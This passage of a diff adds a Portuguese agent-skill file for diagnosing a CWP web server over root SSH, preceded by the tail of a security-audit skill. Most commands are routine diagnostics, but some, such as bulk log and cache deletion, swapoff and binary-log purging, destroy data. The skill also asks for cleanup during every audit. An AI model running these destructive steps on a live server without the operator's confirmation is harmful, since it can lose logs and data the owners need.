**Consultar quando:**
- Implementar WAF (Web Application Firewall)
- Configurar SIEM (Security Information and Event Management)
- Compliance ISO 27001
- Pentest avançado
```javascript
// Exemplo: pesquisar hardening Nginx
mcp__dify-kb__dify_kb_retrieve_segments({
dataset_id: "7f63ec0c-6321-488c-b107-980140199850",
query: "nginx hardening security headers ssl tls",
top_k: 3
})
```
---
## Changelog
### v2.0.0 (2026-02-03)
- **ENHANCED:** Workflows detalhados para OWASP Top 10
- Template de relatório completo
- Código exemplo vulnerável vs seguro
- Payloads de teste (SQL injection, XSS, etc.)
- Checklist GDPR completo
- Hardening checklist por componente
- Ferramentas SAST/DAST documentadas
- Severidade com CVSS scoring
- Confidencialidade e handling de dados
### v1.0.0 (2026-01-27)
- Versão inicial
- OWASP Top 10 básico
- Checklist GDPR
- Ferramentas de análise
---
**Versão:** 2.0.0 | **Autor:** Descomplicar®
**Última actualização:** 2026-02-03 (OWASP detalhado + Template completo + Hardening)
---
## Quando NÃO Usar
- Para tarefas fora do domínio de especialização desta skill
- Quando outra skill mais específica está disponível
- Para operações que requerem confirmação manual do utilizador
## Exemplos
### Exemplo 1: Uso Básico
```
Input: [descrição da tarefa]
Output: [resultado esperado]
```
### Exemplo 2: Uso Avançado
```
Input: [caso complexo]
Output: [resultado detalhado]
```

679
infraestrutura/skills/server-health/SKILL.md Normal file
View File

@@ -0,0 +1,679 @@
---
name: server-health
description: Server health monitoring and diagnostics. Checks system resources, services
status, and identifies issues. Use when user mentions "server health", "system check",
"server status", "resource monitoring", "server diagnostics".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 75
user_invocable: true
desk_task: 1484
---
# /server-health - Diagnóstico Completo de Servidor
Checklist sistemático para diagnosticar problemas de performance ou auditar estado do servidor CWP.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
**Acesso:**
```javascript
mcp__ssh-unified__ssh_execute({
server: "server",
command: "<comando>"
})
```
---
## Modos de Execução
| Comando | Descrição |
|---------|-----------|
| `/server-health` | Diagnóstico completo (todos os checks) |
| `/server-health quick` | Apenas métricas críticas (load, RAM, disco) |
| `/server-health mysql` | Focus em MySQL e bases de dados |
| `/server-health ssl` | Verificação de todos os certificados SSL |
| `/server-health sites` | Status de todos os sites WordPress |
---
## Workflow Completo
### Passo 1: Sistema (Paralelo)
**Executar em paralelo:**
```bash
# Load average (3 valores: 1min, 5min, 15min)
uptime
# RAM e Swap
free -h
# Espaço em disco
df -h
# Top processos CPU
top -bn1 | head -20
# Load numérico
cat /proc/loadavg
# CPU/IO statistics
vmstat 1 3
# Processos específicos (Apache, MySQL, Nginx)
ps aux | grep -E 'httpd|mysql|nginx' | grep -v grep
```
**Validação:**
- ✅ Load 1min <2 → OK
- ⚠️ Load 1min 2-5 → Warning
- ❌ Load 1min >5 → Critical
- ✅ RAM <70% → OK
- ❌ Swap >10% → Investigar causa
### Passo 2: MySQL
```bash
# Status geral MySQL
mysqladmin status
# Processos activos
mysqladmin processlist | head -20
# Threads conectadas
mysql -e "SHOW GLOBAL STATUS LIKE 'Threads%';"
# Slow queries
mysql -e "SHOW GLOBAL STATUS LIKE 'Slow_queries';"
# Tamanho das BDs
mysql -e "SELECT table_schema AS 'Database',
ROUND(SUM(data_length + index_length) / 1024 / 1024, 2) AS 'Size (MB)'
FROM information_schema.TABLES
GROUP BY table_schema
ORDER BY SUM(data_length + index_length) DESC
LIMIT 10;"
# Verificar se há tabelas corrompidas
mysqlcheck --all-databases --check
```
**Queries Críticas:**
```sql
-- Ver queries lentas em execução
SELECT id, user, host, db, command, time, state, LEFT(info, 100) as query
FROM information_schema.PROCESSLIST
WHERE command != 'Sleep'
AND time > 5
ORDER BY time DESC;
-- BDs maiores que 500MB
SELECT table_schema,
ROUND(SUM(data_length + index_length) / 1024 / 1024, 2) AS size_mb
FROM information_schema.TABLES
GROUP BY table_schema
HAVING size_mb > 500
ORDER BY size_mb DESC;
```
### Passo 3: Web Servers
```bash
# Status Apache
systemctl status httpd --no-pager | head -15
# Status Nginx
systemctl status nginx --no-pager | head -15
# Testar localhost
curl -sI localhost | head -10
# Verificar GZIP
curl -sI -H 'Accept-Encoding: gzip' localhost | grep -i encoding
# Conexões activas
netstat -an | grep :80 | wc -l
netstat -an | grep :443 | wc -l
# Workers Apache
ps aux | grep httpd | wc -l
# Virtual hosts configurados
httpd -S 2>&1 | grep -E 'port|namevhost' | head -20
```
### Passo 4: PHP
```bash
# Versão PHP
php -v | head -1
# Memory limit
php -i | grep memory_limit
# OPcache status
php -i | grep -E 'opcache.enable|opcache.memory_consumption'
# Processos PHP-FPM
ps aux | grep php-fpm | wc -l
# Configuração PHP-FPM (se existir)
php-fpm -tt 2>&1 | head -30
```
### Passo 5: SSL/Certificados
```bash
# Listar todos os certificados instalados
ls -lh /root/.acme.sh/cwp_certs/
# Verificar próximas renovações (todos os domínios)
for d in $(ls /root/.acme.sh/cwp_certs/); do
echo "=== $d ==="
grep -E 'Le_NextRenewTimeStr|Le_Alt' /root/.acme.sh/cwp_certs/$d/*.conf 2>/dev/null | head -3
done
# Verificar certificados activos em Nginx
for conf in /etc/nginx/vhosts/*.conf; do
domain=$(basename $conf .conf)
echo "=== $domain ==="
grep -E 'ssl_certificate|server_name' $conf | head -3
done
# Testar um domínio específico
echo | openssl s_client -connect DOMINIO:443 2>/dev/null | openssl x509 -noout -dates -subject
# Log de renovações recentes
tail -100 /root/.acme.sh/acme.sh.log | grep -E 'Renew|error|success'
```
**Validação SSL:**
- ✅ Renovação >30 dias → OK
- ⚠️ Renovação 15-30 dias → Avisar
- ❌ Renovação <15 dias → Urgente
### Passo 6: Segurança
```bash
# Fail2ban status
systemctl status fail2ban --no-pager 2>/dev/null || echo 'fail2ban não instalado'
# Jails activos
fail2ban-client status 2>/dev/null | head -10
# IPs banidos
fail2ban-client status sshd 2>/dev/null | grep "Banned IP"
# Portas abertas
netstat -tlnp | grep LISTEN | head -20
# Últimos logins SSH
last -10
# Tentativas SSH falhadas
grep "Failed password" /var/log/secure | tail -20
# Firewall activo?
systemctl status firewalld --no-pager || iptables -L -n | head -20
```
### Passo 7: Sites WordPress
```bash
# Verificar todos os sites WordPress
for dir in /home/*/public_html; do
if [ -f "$dir/wp-config.php" ]; then
domain=$(basename $(dirname $dir))
echo "=== $domain ==="
# Versão WordPress
grep "wp_version = " $dir/wp-includes/version.php | head -1
# Tamanho wp-content
du -sh $dir/wp-content
# Plugins activos (via BD se possível)
# Testar acesso HTTP
curl -sI "http://$domain" | head -3
fi
done
# Script de verificação completo
/root/scripts/check-wp-sites.sh 2>/dev/null || echo "Script não existe"
```
---
## Template de Output
```markdown
# 🔍 Server Health Report - YYYY-MM-DD HH:MM
## ⚡ Resumo Executivo
| Métrica | Valor | Status | Limite |
|---------|-------|--------|--------|
| Load (1m) | X.XX | ✅/⚠️/❌ | <2 |
| RAM Usada | XX% | ✅/⚠️/❌ | <70% |
| Swap Usado | XX% | ✅/⚠️/❌ | <10% |
| Disco / | XX% | ✅/⚠️/❌ | <70% |
| MySQL Threads | XX | ✅/⚠️/❌ | <50 |
| Slow Queries | XX | ✅/⚠️/❌ | <10 |
| Sites WP OK | XX/YY | ✅/⚠️/❌ | 100% |
| SSL Expiring | XX | ✅/⚠️/❌ | 0 |
**Health Score:** XX/100
---
## 🚨 Alertas Críticos
> [!danger] CRÍTICO
> - Load >5 há 10 minutos (possível loop infinito)
> - Swap 45% usado (memória insuficiente)
> [!warning] ATENÇÃO
> - 3 sites WordPress com erros HTTP 500
> - Certificado SSL solarfv360.pt expira em 12 dias
---
## 📊 Detalhes
### Sistema
```
Uptime: 45 days, 12:34
Load Average: 2.15, 1.89, 1.56
RAM: 12.5 GB / 16 GB (78%) ⚠️
Swap: 1.2 GB / 4 GB (30%) ❌
Disco /: 85 GB / 200 GB (42%) ✅
```
**Top Processos CPU:**
```
PID USER %CPU %MEM COMMAND
1234 mysql 45.2 12.3 mysqld
5678 apache 8.5 2.1 httpd
```
### MySQL
**Status:**
- Uptime: 1,234,567 seconds
- Threads conectadas: 23 / 151 ✅
- Slow queries: 145 (total) ⚠️
- Queries/segundo: ~150
**BDs Grandes (>500MB):**
| Base de Dados | Tamanho |
|---------------|---------|
| ealmeida_desk24 | 1,234 MB |
| carstuff_prod | 856 MB |
**Queries Lentas Activas:**
```
id: 12345 | user: wp_user | time: 45s
query: SELECT * FROM wp_posts WHERE...
```
### Web
**Apache:** ✅ Activo (145 workers)
**Nginx:** ✅ Activo (proxy reverso)
**Conexões:**
- HTTP (80): 23 conexões
- HTTPS (443): 67 conexões
**GZIP:** ✅ Activo
### PHP
**Versão:** PHP 8.1.27
**Memory Limit:** 256M
**OPcache:** ✅ Activo (128MB)
**PHP-FPM Workers:** 12
### SSL
**Certificados Instalados:** 34
**Renovações Próximas (<30 dias):**
| Domínio | Expira em | Status |
|---------|-----------|--------|
| solarfv360.pt | 12 dias | ⚠️ Renovar |
| emanuelalmeida.pt | 28 dias | ⚠️ Avisar |
**Problemas:**
- ❌ certificado_antigo.pt - Expirado há 5 dias
### Segurança
**Fail2ban:** ✅ Activo
**Jails:** sshd, apache-auth, nginx-limit
**IPs Banidos:** 45 (último: 123.45.67.89)
**Portas Abertas:**
- 22 (SSH) ✅
- 80 (HTTP) ✅
- 443 (HTTPS) ✅
- 3306 (MySQL) ⚠️ Público (deveria ser localhost only)
**Últimas Tentativas SSH Falhadas:**
```
2026-02-03 10:15 - Invalid user admin from 192.168.1.100
2026-02-03 09:45 - Failed password for root from 45.67.89.10
```
### Sites WordPress
**Total:** 15 sites
**OK:** 12 (80%) ✅
**Erros:** 3 (20%) ❌
**Sites com Erro:**
| Domínio | Erro | Acção |
|---------|------|-------|
| site-antigo.pt | HTTP 500 | Verificar error_log |
| teste.descomplicar.pt | HTTP 404 | Site desactivado? |
---
## 📋 Recomendações Prioritárias
### 🔴 URGENTE (Hoje)
1. ⚠️ Reduzir uso de Swap (45%) - Investigar processos
2. ❌ Renovar SSL solarfv360.pt (12 dias restantes)
3. ❌ Corrigir sites com HTTP 500 (3 sites)
### 🟡 IMPORTANTE (Esta Semana)
4. ⚠️ Optimizar queries lentas MySQL (145 total)
5. ⚠️ Limpar BDs grandes (ealmeida_desk24 1.2GB)
6. ⚠️ Fechar porta MySQL 3306 ao público
### 🟢 MELHORIAS (Mês)
7. ✅ Configurar alertas automáticos para Swap >20%
8. ✅ Criar backup automático de certificados SSL
9. ✅ Actualizar PHP para 8.2 (actualmente 8.1)
---
## 🔧 Troubleshooting Sugerido
### Swap Alto (>30%)
```bash
# Ver o que está a usar memória
ps aux --sort=-%mem | head -10
# Limpar swap (CUIDADO!)
swapoff -a && swapon -a
```
### Load Alto (>5)
```bash
# Ver processos por CPU
ps aux --sort=-%cpu | head -10
# Ver I/O wait
iostat -x 1 5
# Identificar processo problemático
top -bn1 | head -20
```
### MySQL Lento
```bash
# Ver queries activas
mysqladmin processlist
# Ver slow query log
tail -50 /var/log/mysql/slow.log
# Optimizar tabelas
mysqlcheck --optimize --all-databases
```
### Sites WordPress com Erro
```bash
# Ver error log
tail -100 /home/USER/logs/error.log
# Verificar permissões
ls -lh /home/USER/public_html/wp-content
# Corrigir permissões
chown -R USER:USER /home/USER/public_html/wp-content
```
---
*Gerado via /server-health v2.0 | Descomplicar®*
```
**Instruções de Implementação:**
1. Executar comandos em paralelo quando possível (mcp__ssh-unified__ssh_execute)
2. Calcular health score: (checks OK / total checks) × 100
3. Gerar alertas baseados em thresholds
4. Agrupar recomendações por urgência
5. Incluir troubleshooting específico para cada problema detectado
---
## Thresholds de Alertas
| Métrica | ✅ OK | ⚠️ Warning | ❌ Critical |
|---------|-------|------------|-------------|
| **Load (1m)** | <2 | 2-5 | >5 |
| **RAM** | <70% | 70-85% | >85% |
| **Swap** | <10% | 10-30% | >30% |
| **Disco** | <70% | 70-85% | >85% |
| **MySQL Threads** | <50 | 50-100 | >100 |
| **Slow Queries** | 0 | 1-10 | >10 |
| **Sites WP OK** | 100% | 90-99% | <90% |
| **SSL Expiring** | >30d | 15-30d | <15d |
---
## Comandos SSH Específicos
### Verificação Rápida (Quick Mode)
```bash
# Uma linha com todas as métricas críticas
echo "=== QUICK HEALTH ===" && \
uptime && \
free -h | grep Mem && \
df -h | grep -E '^/dev/vda|Filesystem' && \
mysqladmin status 2>&1 | head -1 && \
systemctl is-active httpd nginx mysql
```
### MySQL Deep Dive
```bash
# Optimizar todas as BDs
mysqlcheck --optimize --all-databases
# Limpar logs binários antigos (>7 dias)
mysql -e "PURGE BINARY LOGS BEFORE DATE_SUB(NOW(), INTERVAL 7 DAY);"
# Verificar fragmentação de tabelas
mysql -e "SELECT table_schema, table_name,
ROUND(data_length/1024/1024,2) as data_mb,
ROUND(data_free/1024/1024,2) as free_mb
FROM information_schema.TABLES
WHERE data_free > 0
ORDER BY data_free DESC
LIMIT 10;"
```
### Limpeza de Cache/Temp
```bash
# Limpar cache WordPress (todos os sites)
find /home/*/public_html/wp-content/cache -type f -delete
# Limpar sessions PHP antigas
find /var/lib/php/session -type f -mtime +7 -delete
# Limpar logs Apache/Nginx >30 dias
find /home/*/logs -name "*.log" -mtime +30 -delete
```
---
## Integração com MCPs
```javascript
// Executar diagnóstico completo
async function serverHealthCheck() {
// 1. Sistema (paralelo)
const systemChecks = await Promise.all([
mcp__ssh-unified__ssh_execute({server: "server", command: "uptime"}),
mcp__ssh-unified__ssh_execute({server: "server", command: "free -h"}),
mcp__ssh-unified__ssh_execute({server: "server", command: "df -h"}),
mcp__ssh-unified__ssh_execute({server: "server", command: "top -bn1 | head -20"})
]);
// 2. MySQL
const mysqlStatus = await mcp__ssh-unified__ssh_execute({
server: "server",
command: "mysqladmin status && mysql -e \"SHOW GLOBAL STATUS LIKE 'Threads%';\""
});
// 3. SSL
const sslCheck = await mcp__ssh-unified__ssh_execute({
server: "server",
command: "for d in $(ls /root/.acme.sh/cwp_certs/); do echo \"=== $d ===\"; grep Le_NextRenewTimeStr /root/.acme.sh/cwp_certs/$d/*.conf 2>/dev/null; done"
});
// Processar e gerar report
return processHealthData(systemChecks, mysqlStatus, sslCheck);
}
```
---
## Anti-Patterns
| Anti-Pattern | Problema | Solução Correcta |
|--------------|----------|------------------|
| Assumir SSH como root | Pode falhar | Verificar permissões primeiro |
| Executar comandos sequenciais | Lento | Paralelo quando possível |
| Ignorar exit codes | Falhas silenciosas | Validar cada comando |
| Não limpar recursos temp | Consume espaço | Limpeza em cada audit |
| Não documentar problemas | Sem histórico | Gravar em Desk/Obsidian |
---
## Checklist de Execução
- [ ] SSH conecta (testar `whoami`)
- [ ] Todas as métricas recolhidas (sistema, mysql, web, ssl)
- [ ] Thresholds aplicados (calcular status)
- [ ] Health score calculado
- [ ] Alertas gerados (crítico/warning)
- [ ] Recomendações priorizadas
- [ ] Troubleshooting incluído
- [ ] Report formatado (Markdown)
- [ ] Opcional: Gravar em Desk ou Obsidian
---
## Datasets Dify (Consulta Obrigatória)
Antes de executar diagnóstico complexo ou para troubleshooting específico:
| Dataset | ID | Uso |
|---------|----|----|
| **TI (Tecnologia da Informação)** | `7f63ec0c-6321-488c-b107-980140199850` | Diagnósticos gerais |
| **Linux** | `bde4eddd-4618-402c-8bfb-bb947ed9219d` | Comandos específicos |
| **CWP Centos Web Panel** | `b2a4d2c5-fe55-412c-bc28-74dbd611905d` | Configurações CWP |
**Consultar quando:**
- Problema não coberto por este guia
- Optimização específica de serviço
- Troubleshooting de erro desconhecido
- Configuração avançada CWP/MySQL/Nginx
```javascript
// Exemplo: pesquisar optimização MySQL
mcp__dify-kb__dify_kb_retrieve_segments({
dataset_id: "7f63ec0c-6321-488c-b107-980140199850",
query: "mysql slow query optimization innodb tuning",
top_k: 3
})
```
---
## Changelog
### v2.0.0 (2026-02-03)
- **ENHANCED:** Workflows detalhados para cada passo
- Modos de execução (quick, mysql, ssl, sites)
- Template de output completo com troubleshooting
- Thresholds documentados
- Comandos SSH específicos
- Health score calculation
- Integração MCPs documentada
- Anti-patterns identificados
- Checklist de execução
### v1.0.0 (2026-01-30)
- Versão inicial
- Diagnóstico: Sistema, MySQL, Web, PHP, SSL, Segurança
- Thresholds definidos
- Output template markdown
---
**Versão:** 2.0.0 | **Autor:** Descomplicar®
**Última actualização:** 2026-02-03 (Workflows completos + Troubleshooting)
---
## Quando NÃO Usar
- Para tarefas fora do domínio de especialização desta skill
- Quando outra skill mais específica está disponível
- Para operações que requerem aprovação manual obrigatória
- Quando os requisitos não estão claramente definidos
## Exemplos de Uso
### Exemplo 1: Caso Básico
```
User: [requisição simples relacionada com server-health]
Skill: [execução directa com validação]
Output: [resultado conciso e accionável]
```
### Exemplo 2: Caso Complexo
```
User: [requisição multi-passo ou complexa]
Skill:
1. Análise dos requisitos
2. Planeamento da abordagem
3. Execução faseada
4. Validação contínua
Output: [resultado detalhado com próximos passos]
```
### Exemplo 3: Caso com Dependências
```
User: [requisição que depende de outros sistemas]
Skill:
1. Verificar dependências disponíveis
2. Coordenar com skills/MCPs necessários
3. Executar workflow integrado
Output: [resultado completo com referências]
```